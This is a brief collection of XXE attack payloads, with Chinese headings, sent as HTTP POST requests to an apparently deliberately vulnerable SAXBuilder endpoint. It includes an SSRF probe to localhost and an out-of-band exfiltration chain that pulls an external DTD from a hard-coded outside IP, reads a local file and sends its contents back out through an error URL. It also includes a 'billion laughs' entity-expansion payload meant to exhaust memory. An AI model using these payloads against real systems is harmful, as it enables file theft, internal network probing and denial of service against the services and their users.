XXE1
POST /xxe//SAXBuilder/vuln HTTP/1.1

<!DOCTYPE test [<!ENTITY xxe SYSTEM "http://127.0.0.1:8888">]><root>&xxe;</root>


XXE2获取文件内容
POST /xxe/SAXBuilder/vuln HTTP/1.1

<!DOCTYPE message [
    <!ENTITY % ext SYSTEM "http://114.132.198.130:8000/ext.dtd">
    %ext;
]>
<message></message>

ext.dtd的内容如下：
<!ENTITY % file SYSTEM "file:///tmp/gcf.txt">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'http://114.132.198.130:8000/%file;'>">
%eval;
%error;
python3 -m http.server


xxe内存持续上涨
<!DOCTYPE lolz [
    <!ENTITY lol "lol">
    <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
    <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
    <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
    <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
    <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
    <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
    <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
    <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">]>
<lolz>&lol9;</lolz>